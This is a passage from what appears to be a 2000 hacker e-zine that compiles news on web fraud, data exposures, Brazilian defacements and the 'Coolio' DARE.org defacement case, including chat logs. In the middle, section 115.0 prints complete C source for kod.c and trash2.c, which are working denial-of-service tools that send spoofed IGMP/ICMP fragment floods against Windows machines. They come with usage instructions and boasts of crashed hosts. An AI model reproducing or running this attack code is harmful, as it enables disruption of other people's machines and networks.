~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Online_Temped Expedia, the online travel affiliate of Microsoft, said on Wednesday that it will record a fiscal third quarter charge of $4 to $6 million. The charge is to cover the cost of fraudulent transactions on its Web site. (And who will pay for this fraud? The consumer of course in the form of higher prices.) ZD Net UK http://www.zdnet.co.uk/news/2000/8/ns-13772.html Expedia takes on fraudulent Web charges Wed, 01 Mar 2000 14:04:54 GMT Reuters Online transactions are dealt another blow with Expedia announcement Expedia, the online travel affiliate of Microsoft, said on Wednesday that it will record a fiscal third quarter charge of $4 to $6m (�2 to �3m) to cover the cost of fraudulent transactions on its Web site. The company said stolen credit cards were used to book travel reservations through the site (www.expedia.com). However they said the cards weren't stolen from the site and its customers were not affected. "The security of the Expedia.com site and its customer information has not been compromised," the company said in a statement. The recent theft of credit card numbers from retail Web site CD Universe and RealNames, which sells simplified Internet address services, has exacerbated concerns about the safety of doing business over the Web. Concerns intensified after attacks by suspected computer hackers on a number of major Web sites, including Yahoo!, Amazon.com and eBay. The Expedia reserve represents the company's estimate of unreserved fraudulent activity to date, and is less than one half of one percent of travel tickets sold, the company said. Gross bookings to date on the Expedia.com Web site total more than $1bn (�62m). Expedia shares closed at 20 on Tuesday on the Nasdaq stock market. @HWA 111.0 HNN:Mar 2nd:CD Universe Attempts to Recover From Database Theft ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Almost two months after having most of its customers credit card information posted to the internet and with the perpetrator Maxim still at large CD Universe is attempting to rebuild its business. Now claiming one of the most secure sites on the net CD Universe is hoping that their customers and investors return. Nando Times http://www.nandotimes.com/technology/story/body/0,1634,500175233-500227783-501098807-0,00.html (404) @HWA 112.0 HNN:Mar 2nd:Sony Bungles Personal Info On Web ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by ikegami According to Japan's Asahi News, PlayStation Dot Com Japan (owned by Sony Computer Entertainment) mishandled their customer database. PlayStation Dot Com Japan took online orders for the new PlayStation2. According to the report, users only needed to enter a customer number in the tracking system home page in order to review or change their order. By entering a different number, anyone could browse other's personal information. PlayStation Dot Com Japan is currently checking to see if any information was actually compromised. The system was designed by IBM Japan. Asahi News - Japanese http://www.asahi.com/0302/news/national02032.html @HWA 113.0 HNN:Mar 2nd:CIA Report on Deutch Posted to Net ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by marka The Federation of American Scientists has released a copy of the CIA's report "Central Intelligence Agency Inspector General, Report of Investigation - Improper Handling of Classified Information By John M. Deutch". The report has a "For Official Use Only" handling caveat on it, but the great folks at FAS (who know the Freedom of Information Act way better than a lot of organizations) was able to score a copy and is graciously posting it for all the world to see. Federation of American Scientists Report of Investigation http://www.fas.org @HWA 114.0 HNN:Mar 2nd:Brazil Authorities Try to Combat Online Criminals ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Apocalyse Dow With limited resources and weak laws Brazilian authorities have had a hard time tracking down and arresting cyber criminals. With intrusions into Brazilian Government web sites almost routine lawmakers are looking to pass stricter laws. (Hmmm, same song, different country.) CNN http://www.cnn.com/2000/TECH/computing/03/01/brazil.hackers.reut/index.html Brazil's Net spawns pirates and prodigies March 1, 2000 Web posted at: 3:35 PM EST (2035 GMT) In this story: Dr. Delete and Inferno The second round From the garage to the stock market By Shasta Darlington SAO PAULO (Reuters) -- While Edgar Nogueira's schoolmates in Brazil launch attacks on NASA's and top model Claudia Schiffer's sites, the 17-year-old Internet entrepreneur plots his company's debut on stock exchanges. The Rio de Janeiro high school student designed his own search engine Aonde at the tender age of 14 and has since signed up big-name advertisers and lured potential investors to the company now valued at $5.6 million. "There are some who want to build and some who want to destroy," Nogueira said from his parents' home -- which doubles as an Internet office -- on Brazil's famous Copacabana beach. And Brazil is an ideal place to try both. The country's nascent Internet market is one of the fastest growing in the world, fuelling hundreds of start-ups and attracting as many investors on the lookout for the next Yahoo! or Amazon.com. But the complete lack of laws regulating the still-green industry has also made it a hacker haven. In the first half of February, Brazilian cyber pirates attacked at least 17 international sites including government Web pages from the United States to Peru, the Federal Police said. Dr. Delete and Inferno The group Inferno.com.br scrawled this graffiti message on U.S. space agency NASA's home page: "We don't see much difference between your security system and that of the Brazilian government. You get the picture?" And while Brazil's Dr. Delete invaded Claudia Schiffer's virtual address, dozens of other Brazilian vandals left scathing comments about President Fernando Henrique Cardoso throughout the Web. In Peru, Brazilian hackers defaced with offensive messages a site where April's presidential vote is going to be posted, forcing the government to temporarily shut the page down. Under Brazilian law, hackers can only be punished if they also happen to steal, damage property or violate privacy, and limited resources have been set aside to investigate computer crimes. Ironically, the only government agency prepared to process Internet outlaws, the Federal Police's Department of Computer Crimes, has itself had its Web site defaced, according to local press. "The party is just starting," invaders wrote on the department's Web site at the end of last year. The government is scrambling to create anti-hacker legislation to control the cyber raids but some investors are hoping the Internet itself will convert some outlaws with its promise of big profits. "If they were to put all that vice used to overcome systems into producing things you could have a huge intelligence bank," said Alexandre Marcel, an investor at Estrategia brokerage and adviser for Nogueira's Aonde site. The second round The opportunity for growth and innovation in Brazil is big, investors say. Internet use is growing at over 50 percent a year, but it has still only reached a fraction of the country's 165 million people. International heavyweights like Spain's Terra Networks and New York-based Starmedia gobbled up local Internet upstarts last year, creating Brazil's first generation of cyber millionaires. The second round of buying has already started in 2000. A subsidiary of Portugal Telecom bought major Brazilian Internet provider Zip.net for $415 million earlier this month and other companies and specialized funds are on the prowl for fledgling firms with fresh ideas. Brazil's GP Investimentos fund, owned by renowned investment banking aces, has been one of the biggest spenders on Internet innovation, snapping up upstarts like WebMotors online car seller, created by a twenty-something car specialist who decided to experiment on the Web. In Brazil's northeast, a handful of computer students are leaping from the classroom to the boardroom as graduate theses like Brazilian search engine and media network Radix turn into Internet success stories with the help of a little financing. At the same time, hundreds of young wanna-be-entrepreneurs like Nogueira are building sites at break-neck speed in hopes of catching the Latin Internet wave. "I've had to turn down at least 20 projects so I can focus on making Aonde grow," Estrategia's Marcel said. From the garage to the stock market Aonde started out as more of a hobby than a business but Brazilians flocked to the site in search of country-specific Portuguese language information. The company, which means "Where to" in Portuguese, is now one of the four biggest Brazilian search engines. Nogueira's lunch money has skyrocketed as a result. But the baseball-cap wearing whiz kid says he spends only a few dollars a month on movies and outings with friends. Most of the $8,000 a month in income he has been reinvesting in Aonde to beef up its data base and lure potential investors. Nogueira is now in talks with at least five interested partners and lenders and is eyeing an Initial Public Offering toward the end of the year or in 2001 in New York and Rio de Janeiro. "I want to get a bigger office and hire more people," Nogueira said. His father, a doctor, currently advises him on business deals and his mother helps him answer e-mails and arrange press meetings. "But I guess I have dreams like everybody else. I want to buy a car," he admits. "I wouldn't mind a BMW." @HWA 115.0 HWA:IGMP (kod.c kox.c trash2.c) Windows DoS (Old/but still effective) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Important info regarding the IGMP DoS against Windows machines missing from past issues. kod.c - culprit#1 #include #include #include #include #include #include #include #include size_t hits = 5; unsigned short port = 100; void usage (char *progname) { printf("Usage: %s -p port -t hits\n", progname); exit(1); } void parse_args (int argc, char *argv[], char **target) { int y; *target = argv[1]; if (argv[1][0] == '-') { printf ("Must specify a target.\n"); exit (1); } for (y=2; y < argc; y++) { if (!strcmp(argv[y], "-p")) { y++; port = atoi (argv[y]); } else if (!strcmp(argv[y], "-t")) { y++; hits = atoi (argv[y]); } } } int main (int argc, char *argv[]) { struct sockaddr_in sin; struct hostent *he; size_t maxpkt = 15000; char *target; char buf[15000]; int sd; if (argc < 2) usage (argv[0]); parse_args (argc, argv, &target); if ((he = gethostbyname (target)) == NULL) { herror (target); exit (1); } memcpy (&sin.sin_addr.s_addr, he->h_addr, he->h_length); sin.sin_family = AF_INET; sin.sin_port = htons (port); if ((sd = socket (AF_INET, SOCK_RAW, 2)) == -1) { perror ("error: socket()"); exit (1); } if (-1 == connect (sd, (struct sockaddr *)&sin, sizeof (sin))) { perror ("error: connect()"); close (sd); exit (1); } puts ("Determining max MSGSIZE"); while (send (sd, buf, maxpkt, 0) == -1) { if (EMSGSIZE != errno) { perror ("error: send()"); close (sd); exit (1); } maxpkt -= 1; } hits--; printf ("Max MSGSIZE is %d\n..%d bytes [%s:%d]..\n", maxpkt, maxpkt, target, port); while (hits--) { usleep (50000); if (send (sd, buf, maxpkt, 0) == -1) { perror ("error: send()"); close (sd); exit (1); } printf ("..%d bytes [%s:%d]..\n", maxpkt, target, port); } sleep (1); close (sd); puts ("complete."); exit (0); } -=- trash2.c - updated and nastier attack /* Complex denial of service attack against Windows98/95/2000/NT Machines Overview: sends random, spoofed, ICMP/IGMP packets with random spoof source Result: Freezes the users machine or a CPU usage will rise to extreme lag. tested on: 2.0.35 2.2.5-15 2.2.9 2.0.36 From a 56k I killed 2/5 Win/NT Box's, 5/5 Win98, 4/6 Win95. And those who didn't die, they where lagged to hell... You may freely alter this code, but give credit where credit is due gcc -o trash2 trash2.c will do fine... e-mail leet@ibw.com.ni for any questions. */ /* greets go out to: bombfirst, L^Warrior, codesearc, Asphyx, killtron, ^S|lver, randip(); fucntion stolen from kox.c acidspill, glock24, p0larbear, xjust, bxj2k, JUSTaGIRL [you know who you are] Drth_Maul,everyone in #bitchx@unet, #outlaw@unet, #slackware@unet, #kernel@unet [outlaw] */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include void banner(void) { printf("trash2.c - misteri0@unet [outlaw]\n\n"); printf("\n\n"); } void usage(const char *progname) { printf("usage:\n"); printf("./trash [dst_ip] [# of packets]\n",progname); printf("\t[*] [ip_dst] : ex: 201.12.3.76\n"); printf("\t[*] [number] : 100\n"); printf("\t-----------------------------------------\n"); } unsigned int randip() { struct hostent *he; struct sockaddr_in sin; char *buf = (char *)calloc(1, sizeof(char) * 16); sprintf(buf, "%d.%d.%d.%d", (random()%191)+23, (random()%253)+1, (random()%253)+1, (random()%253)+1); inet_aton(buf, (struct in_addr *)&sin); return sin.sin_addr.s_addr; } int resolve( const char *name, unsigned int port, struct sockaddr_in *addr ) { struct hostent *host; memset(addr,0,sizeof(struct sockaddr_in)); addr->sin_family = AF_INET; addr->sin_addr.s_addr = inet_addr(name); if (addr->sin_addr.s_addr == -1) { if (( host = gethostbyname(name) ) == NULL ) { fprintf(stderr,"ERROR: Unable to resolve host %s\n",name); return(-1); } addr->sin_family = host->h_addrtype; memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length); } addr->sin_port = htons(port); return(0); } unsigned short in_cksum(addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w ; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } int sendwin98bug(struct sockaddr_in *victim, unsigned long spoof) { int BIGIGMP = 1500; unsigned char *pkt; struct iphdr *ip; struct igmphdr *igmp; struct utsname *un; struct passwd *p; int i, s; int id = (random() % 40000) + 500; pkt = (unsigned char *)calloc(1, BIGIGMP); ip = (struct iphdr *)pkt; igmp = (struct igmphdr *)(pkt + sizeof(struct iphdr)); ip->version = 4; ip->ihl = (sizeof *ip) / 4; ip->ttl = 255; ip->tot_len = htons(BIGIGMP); ip->protocol = IPPROTO_IGMP; ip->id = htons(id); ip->frag_off = htons(IP_MF); ip->saddr = spoof; ip->daddr = victim->sin_addr.s_addr; ip->check = in_cksum((unsigned short *)ip, sizeof(struct iphdr)); igmp->type = 0; igmp->group = 0; igmp->csum = in_cksum((unsigned short *)igmp, sizeof(struct igmphdr)); for(i = sizeof(struct iphdr) + sizeof(struct igmphdr) + 1; i < BIGIGMP; i++) pkt[i] = random() % 255; #ifndef I_GROK un = (struct utsname *)(pkt + sizeof(struct iphdr) + sizeof(struct igmphdr) + 40); uname(un); p = (struct passwd *)((void *)un + sizeof(struct utsname) + 10); memcpy(p, getpwuid(getuid()), sizeof(struct passwd)); #endif if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("error: socket()"); return 1; } if(sendto(s, pkt, BIGIGMP, 0, victim, sizeof(struct sockaddr_in)) == -1) { perror("error: sendto()"); return 1; } /* usleep(1000000); */ for(i = 1; i < 5; i++) { if(i > 3) ip->frag_off = htons(((BIGIGMP-20) * i) >> 3); else ip->frag_off = htons(((BIGIGMP-20) * i) >> 3 | IP_MF); sendto(s, pkt, BIGIGMP, 0, victim, sizeof(struct sockaddr_in)); /* usleep(2000000); */ } free(pkt); close(s); return 0; } int send_winbomb(int socket, unsigned long spoof_addr, struct sockaddr_in *dest_addr) { unsigned char *packet; struct iphdr *ip; struct icmphdr *icmp; int rc; packet = (unsigned char *)malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + 8); ip = (struct iphdr *)packet; icmp = (struct icmphdr *)(packet + sizeof(struct iphdr)); memset(ip,0,sizeof(struct iphdr) + sizeof(struct icmphdr) + 8); ip->ihl = 5; ip->version = 4; // ip->tos = 2; ip->id = htons(1234); ip->frag_off |= htons(0x2000); // ip->tot_len = 0; ip->ttl = 30; ip->protocol = IPPROTO_ICMP; ip->saddr = spoof_addr; ip->daddr = dest_addr->sin_addr.s_addr; ip->check = in_cksum(ip, sizeof(struct iphdr)); icmp->type = rand() % 15; icmp->code = rand() % 15; icmp->checksum = in_cksum(icmp,sizeof(struct icmphdr) + 1); if (sendto(socket, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + 1,0, (struct sockaddr *)dest_addr, sizeof(struct sockaddr)) == -1) { return(-1); } ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + 8); ip->frag_off = htons(8 >> 3); ip->frag_off |= htons(0x2000); ip->check = in_cksum(ip, sizeof(struct iphdr)); icmp->type = rand() % 15; icmp->code = rand() % 15; icmp->checksum = 0; if (sendto(socket, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + 8,0, (struct sockaddr *)dest_addr, sizeof(struct sockaddr)) == -1) { return(-1); } free(packet); return(0); } int send_igmp(int socket, unsigned long spoof_addr, struct sockaddr_in *dest_addr) { unsigned char *packet; struct iphdr *ip; struct igmphdr *igmp; int rc; packet = (unsigned char *)malloc(sizeof(struct iphdr) + sizeof(struct igmphdr) + 8); ip = (struct iphdr *)packet; igmp = (struct igmphdr *)(packet + sizeof(struct iphdr)); memset(ip,0,sizeof(struct iphdr) + sizeof(struct igmphdr) + 8); ip->ihl = 5; ip->version = 4; ip->id = htons(34717); ip->frag_off = htons(0x2000); ip->ttl = 255; ip->protocol = IPPROTO_IGMP; ip->saddr = spoof_addr; ip->daddr = dest_addr->sin_addr.s_addr; ip->check = in_cksum(ip, sizeof(struct iphdr)); igmp->type = 8; igmp->code = 0; if (sendto(socket, packet, sizeof(struct iphdr) + sizeof(struct igmphdr) + 1,0, (struct sockaddr *)dest_addr, sizeof(struct sockaddr)) == -1) { return(-1); } ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct igmphdr) + 8); ip->frag_off = htons(8 >> 3); ip->version = 4; ip->id = htons(34717); ip->frag_off |= htons(0x2000); ip->ttl = 255; ip->protocol = IPPROTO_IGMP; ip->saddr = spoof_addr; ip->daddr = dest_addr->sin_addr.s_addr; ip->check = in_cksum(ip, sizeof(struct iphdr)); igmp->type = 8; igmp->code = 0; if (sendto(socket, packet, sizeof(struct iphdr) + sizeof(struct igmphdr) + 1,0, (struct sockaddr *)dest_addr, sizeof(struct sockaddr)) == -1) { return(-1); } ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct igmphdr) + 8); ip->frag_off = htons(8 >> 3); ip->frag_off |= htons(0x2000); ip->check = in_cksum(ip, sizeof(struct iphdr)); igmp->type = 0; igmp->code = 0; if (sendto(socket, packet, sizeof(struct iphdr) + sizeof(struct igmphdr) + 8,0, (struct sockaddr *)dest_addr, sizeof(struct sockaddr)) == -1) { return(-1); } free(packet); return(0); } int main(int argc, char **argv) { struct sockaddr_in dest_addr; unsigned int i,sock; unsigned long src_addr; banner(); if ((argc != 3)) { usage(argv[0]); return(-1); } if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { fprintf(stderr,"ERROR: Opening raw socket.\n"); return(-1); } /* if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); } */ src_addr = dest_addr.sin_addr.s_addr; if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); } printf("Status: Connected....packets sent.\n",argv[0]); for (i = 0;i < atoi(argv[2]);i++) { if (send_winbomb(sock,randip(),&dest_addr) == -1 || send_igmp(sock,randip(),&dest_addr) == -1 || sendwin98bug(&dest_addr, randip()) ) { fprintf(stderr,"ERROR: Unable to Connect To host.\n"); return(-1); } usleep(10000); } } -=- Background Info: Re: IGMP fragmentation bug Aleph One (aleph1@SECURITYFOCUS.COM) Tue, 13 Jul 1999 00:13:47 -0700 Summary of the responses to this query. It seems the vulnerability can't be reproduces reliably in all instances. Try running the exploits for several minutes. Successful results have been obtained across a LAN as well as over the Internet. The result can vary from rebooting the machine, blue screen of death or killing networking. Several exploits have been produced, including kod, kox, pimp, moyari13, misfrag, faux and bengay. If you can't reproduce the vulnerability with one try another. All version of Windows 95 and 98 are believed to be vulnerable (standard, OEM, SE, other languages). The are reports of Windows 200 Advance Server Beta 3, Professional Beta 3 and Server Beta 3 being vulnerable. The are mixed reports of Windows 2000 build 2000 being vulnerable. The is at least one report that Windows 2000 build 2070 is not vulnerable. At least one report claims that Windows NT 4.0 SP4 is vulnerable but others have reported otherwise. -- Elias Levy Security Focus http://www.securityfocus.com/ -=- Re: Patch for w98/igmp frag bug (alias kod) and ICMP-type 13 (aliasmoyari) DoS. Where? To: BUGTRAQ@SECURITYFOCUS.COM Subject: Re: Patch for w98/igmp frag bug (alias kod) and ICMP-type 13 (aliasmoyari) DoS. Where? From: R a v e N Date: Sat, 28 Aug 1999 19:48:59 +0300 Approved-By: aleph1@SECURITYFOCUS.COM Delivered-To: bugtraq@securityfocus.com References: <37ce1592.7548193@tom.us.es> Reply-To: barakirs@netvision.net.il Sender: Bugtraq List Microsoft didn't release a working* patch against the IGMP headers attack yet. It usually takes them a couple of months to release a patch against a DoS attack. I personally don't like the idea that even the dumbest script kiddie in the world could DoS me when I use Windows to connect to the Internet and run applications I don't have under Linux (I hate emulators and they hate me. We never get along. lol). Anyway, about that "downloader" you've mentioned: many products, whether they are freeware or shareware, come as some kind of a "downloader". I don't think Microsoft wants you to run this program in order to obtain information about your computer. They have other ways... * I said working because I saw some kind of an "experimental fix" (that's how they called it) on M$'s website once. I tried it and it didn't work at all (I tried all of the .c sources. kod.c, kox.c, fawx.c and that other one, whatever it's name is. Some of them worked, some didn't. But the point is that some of them worked. I tried finding a URL for you guys on M$'s little webserver... no luck. It seemed to have disappeared. So much for "experimental fixes"... Roman Medina-Heigl Hernandez wrote: > {Sorry if this is known... Aleph, feel free to discard this message.} > > I've been looking for a M$ *w98* patch for these DoS bugs and I've > found nothing. I visited M$ web, used the site' search engine (tried > keywords like "kod", "igmp", etc), viewed w98 support section, > security bulletins, ... with no success. :-( > > M$ recommends a patch called "System Update" (included in Service > Pack 1), although it says nothing about the related DoS. Same occurs > with SP1 (for w98). Do they fix the problem? At least it seems not to > be documented. > > I also want to show my unconformity with M$ policy about w98 SP. You > are forced to download an updater program in order to be able to > download SP (the alternative method is paying some $$ for ordering a > cd). Why do I need such a program? (I do not want to give the chance > to send info about my machine to M$...). Most of w98 users are usually > referred as dumb users, but I don't think they cannot use a patch in > .exe form (like NT Service Packs). Don't you think so, Bill? ;-) > > Yours, Rom�n. > > ------ E.T.S. Ingenieros Telecomunicacion --------- > ---\\ Roman Medina-Heigl Hernandez //--- > ---// E-Mail: roman@esi.us.es \\--- > ------- URL: http://www.esi.us.es/~roman ---------- -- It took the computing power of three Commodore 64 computers to fly to the moon. It takes a 486 66MHZ computer to run Windows 95. Anything wrong? http://blacksun.jemix.com @HWA 116.0 HNN:Mar 3rd:Coolio Charged With Defacement ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The LAPD Computer Crimes Unit plans to charge a 17-year-old New Hampshire resident in connection with defacing the Dare.org Web site. 'Coolio' has also admitted to defacing RAS.com and several other sites. The FBI is also investigating him concerning any involvement he may have had with DDoS attacks. He will be charged with unauthorized access to a computer and felony vandalism and would be charged as a juvenile. If convicted he could receive a fine of $18,000 in restitution and possible time in a juvenile facility. If he is charged in New Hampshire he could be tried as an adult and would face five to 15 years in prison. MSNBC http://www.msnbc.com/news/377102.asp ABC News http://www.abcnews.go.com/sections/tech/DailyNews/webattack000302.html MSNBC; Dennis Moran Jr., a.k.a. 'Coolio,' spoke to NBC News Friday about computer hacking. follow url ... heh �Coolio� arrested, denies bringing down major sites By Bob Sullivan � MSNBC March 8 A New Hampshire teen-ager who had been questioned about last month�s crippling Internet assault has been arrested on an unrelated charge. Seventeen-year-old Dennis F. Moran is charged with defacing the anti-drug Web site DARE.org. But in an interview with NBC News last week, Moran denied he had any involvement in the string of Web site attacks that last month took down some of the Internet�s biggest companies. Attrition.org: Coolio's defacements http://www.attrition.org/mirror/attrition/coolio.html DURING AN INTERVIEW with the network, the New Hampshire teen who uses the nickname Coolio on the Net admitted breaking into perhaps 100 computers and defacing the DARE.org Web site. He also admitted to two other defacements � RSA.com in February and CWC.gov in November. But he flatly denied any involvement in the Web site attacks that toppled Yahoo, Amazon, eBay and several other major Internet sites. And a federal investigator has told NBC�s Pete Williams that government agents are not close to an arrest in those larger Web site attacks and that they are �losing interest� in Moran as a suspect. The nickname Coolio has circulated in connection with those Web attacks for several weeks, in part because investigators reportedly hold transcripts of chat room conversations that they say are incriminating. Federal investigators searched his home last month and took Moran�s computers as part of their investigation, according to several MSNBC sources. But Moran told NBC it was all part of a joke that got out of hand � that his Internet friends started a rumor that he had committed those crimes, and then as a joke, he took credit for them. That joke, he said, then became a topic for rabid conversation in an Internet chat room. The conversations were observed by a security expert from Stanford University who sent logs to the FBI, and then he became a suspect, the youth said. FACING CHARGES Detective Michael Brausam of the LAPD, who investigated the DARE.org defacement, told MSNBC that Moran admitted to investigators last month that he defaced three Web sites, including RSA.com. Moran repeated that admission in his interview with NBC. The RSA site was hijacked in the middle of the furious denial-of-service attacks that rendered useless Yahoo, eBay, Amazon and several other major Web sites. But Moran denied being a part of those massive denial-of-service attacks. Moran is not the only suspect in those attacks; investigators believe there were at least one and perhaps several copycats involved in the flurry of vandalism which started Feb. 7 when Yahoo.com went down for about three hours. MSNBC has learned that investigators executed a search warrant at Coolio�s home last month and confiscated all his computers in connection with their investigation of the crime. With regards to the DARE.org defacement, Brausam said Moran would be charged with unauthorized access to a computer and vandalism and would be charged as a juvenile. That means he faces at least $18,000 in restitution and possible time in a juvenile facility. �He did say he had done denial-of-service attacks before and said he had compromised hundreds of computers,� Brausam said. The detective began investigating Coolio after the Dare.org attack. Dare.org was hosted by a Los Angeles ISP at the time of the defacement. Brausam traced the attacks to a Web site hosted by an Arizona ISP and said he found there a Web page that hosted the same images used to deface Dare.org. That Web site also hosted programs that enabled �smurf� attacks, the same kind of attack used on Yahoo, Brausam said. MSNBC has identified two denial-of-service programs Coolio adjusted to allow IP �spoofing� capabilities. The first, called kox, is a modified version of the �Kiss of Death� denial of service program. Coolio took credit for the work by signing it and sending it to security mailing lists. The e-mail address used on the program maps to the server in Arizona where other Coolio files were discovered by Brausam. The e-mail also matches an e-mail address provided to MSNBC by several Coolio Internet associates. The second program, Targa, was described to MSNBC by a school-aged friend of Coolio�s who said he�d used it once. A member of the #goonies said Coolio�s Targa was a modified version of the Targa written by Mixter, a German programmer who has taken credit for writing denial-of-service tools. After Brausam executed the search warrant at the Arizona ISP, he was able to uncover Coolio�s identity and residence in New Hampshire. But his investigation stalled there while attempting to get the local New Hampshire police department to execute a search warrant. The same day as the Dare.org defacement, a government-run Web site, CWC.gov, was also defaced by Coolio, he said in the interview with NBC. That defacement included a death threat to the president, so the Secret Service became involved in the investigation. The Web site was defaced with the message: �If prayers do not become mandatory throughout the United States, we will detonate our nuclear bombs and your President Clinton and his interns will die,� according to an archive of the attack on attrition.org. While Brausam waited for his search warrant, the Web site attacks on Yahoo, eBay and the other major Internet companies began. Then, on Feb. 12, the RSA.com home page was hijacked. Brausam described Coolio as a �genius� who told authorities he�d been using computers since he was 3 years old and had taken to using the Internet 16 hours a day since dropping out of school last year. SOURCE: Associated Press That�s consistent with the image of Coolio that�s been shared by friends and associates MSNBC has interviewed during the past few weeks. He�s been described by both high school friends and Internet associates as a smart high school dropout who regularly gets high by drinking cough syrup. MSNBC has also learned that several of his Internet associates are cooperating with investigators and have fingered Coolio as the culprit in the larger Web page attacks. LOGS TELL A STORY Some of the logged chat room conversations � which Coolio now says are part of an elaborate joke and should not be taken seriously � were viewed independently by MSNBC. Almost immediately after the first attack, MSNBC was alerted to the #goonies chat room that the suspect frequented and told that Moran was responsible. �I think it�s childish and I think he should be stopped,� the anonymous writer said. MSNBC entered the chat anonymously. Coolio, unaware he was being observed by a journalist, made several comments suggesting he had special knowledge of the attacks. In the first excerpt of the chat reproduced below, participants are watching CNN�s coverage of the hacker attacks, often commenting on the report�s accuracy and inaccuracy. When discussing the attack, far from the false boasts typical of hackers trying to take credit for attacks they did not perform, Coolio is deliberately coy. He takes pains, for example, to refer to the attackers in the third person. In the log excerpts that follow, all nicknames other than Coolio�s have been altered, but the rest of the statements, including typos, are published as they appeared: [17:33] i don�t think the same hackers that did yahoo had anything to do with cnn [17:33] they heard what happened to yahoo yesterday [17:33] so they decided to copy it [17:34] did they have anything to do with amazon.com? [17:34] person3, yes they did [17:34] since 45 minutes ago [17:34] alright. [17:34] tehye switched from ebay to amazon. But there are several references to Coolio making the news, even though that nickname didn�t appear in news reports until one week later. [18:24] hahaha, coolio made ABC world news tonight, jesus f*ing christ. [18:24] how the f... [18:24] person1, what�s ABC world news tonight? {excerpt removed} [18:24] Dr_Coolio, ABC�s world news television show, every night. [18:24] haha its their network news show coolio [18:24] cool what�d they say [18:24] Coolio what did you do that is getting so much attention [18:24] and did they only talk about yahoo, or buy.com and ebay and amazon too? {excerpt deleted} [18:29] haha the zdtv just acknowledged that amazon was down [18:29] on TV? [18:29] awesome! "oh, my god, coolio is way famous." COMMENT IN #GOONIES CHAT ROOM In this segment, one of Coolio�s associates begins to cross the line, suggesting directly that Coolio is responsible. Coolio reacts sharply: [18:32] oh, my god, coolio is way famous. [18:33] dude, coolio, sitting at his computer ... disabled yahoo, and fooled people thinking he was a group of f*ing hackers [18:33] ya no sH**..don�t [18:33] heh.. {excerpt removed} [18:33] how the f... coolio shouldn�t be allowed to have this kind of power. [18:33] SHUT THE F*** UP PERSON1 [18:33] SHUT THE F*** UP PERSON1 [18:33] hahahahah The next day, Coolio was still fielding questions in #goonies about what he did and didn�t do: [11:58] did you do all the other ones or were they copycats? [11:58] neck hurts bad [11:58] cnn znd zdnet were copycats And in this passage, the goonies chuckle about what what seems to be an accidentally accurate description of Coolio. No reason for real alarm, though, they indicate the newscaster is wrong when he describes the suspect as a current student: [12:15] ahahhahahaha he said 17 year old kid [12:15] person1, WHO DID? [12:15] HAHAHA i wouldn�t be suprised if it was a 17 year old kid [12:15] this guy on cnn [12:16] f*** [12:16] Dr_Coolio: TURN ON CNN [12:16] kill him [12:16] shut his face up [12:16] a former hacker guy who now works in security [12:16] he said that he goes to school,though And finally, Coolio corrects the goonies when one slips up and forgets to use the third person when referring to the hackers as he discusses a television program describing the denial of service attacks as a trivial programming feat: [12:18] ahahah this guy on cnn.. [12:19] man these dudes are sayin you got no skillz [12:19] not me, you mean the hackers -=- ABC; �Coolio� Admits Hacks Teen Hacker Tells ABCNEWS He Hacked Three Sites but Denies Major Web Attacks Los Angeles police Detective Michael Brausman told ABCNEWS that the charges come in connection with the vandalism of the dare.org Web site - something Coolio allegedly has admitted to. (Photodisc) By Brian Ross and Jonathan Dube March 2 � A 17-year-old hacker who calls himself �Coolio� told ABCNEWS he vandalized three Web sites but was not involved in last month�s Web attacks. The Los Angeles district attorney�s office is expected to charge the teen-ager, who lives in New Hampshire, with vandalism for defacing at least one of the sites, Dare.org, Los Angeles police Detective Michael Brausman told ABCNEWS. Coolio, speaking through his father today, admitted to ABCNEWS that he hacked Dare.org, CWC.gov and RSA.com. His father said Coolio wouldn�t comment when asked whether he hacked into any other sites. Coolio Denies Web Attacks But, in an earlier interview with ABCNEWS, Coolio denied any involvement with the denial-of-service attacks last month that took down leading Web sites such as Yahoo!, Amazaon.com and eBay. �I am categorically denying that I had anything to do with the Yahoo attack,� Coolio told ABCNEWS. � � I had nothing to do with any of the Web sites that were taken down.� Coolio says has been using computers since he was 4 years old and spends about 12 hours a day on the Internet. The FBI executed a search warrant at Coolio�s home last month and confiscated several computers. Many Coolios Federal authorities tell ABCNEWS they are investigating him in connection with the denial-of-service attacks and haven�t ruled him out as a suspect. But they said no indictment related to the attacks is imminent. The FBI believes someone who calls himself �Coolio� may have been involved in the attacks because they have logs of online chat discussions, which ABCNEWS has obtained, in which chatters finger Coolio as the culprit and he doesn�t deny involvement. But he told ABCNEWS he was just joking around with friends in the chats. The investigation has been difficult, in part, because many people use the online name �Coolio.� Last month investigators interviewed another person who goes by �Coolio� in California regarding the 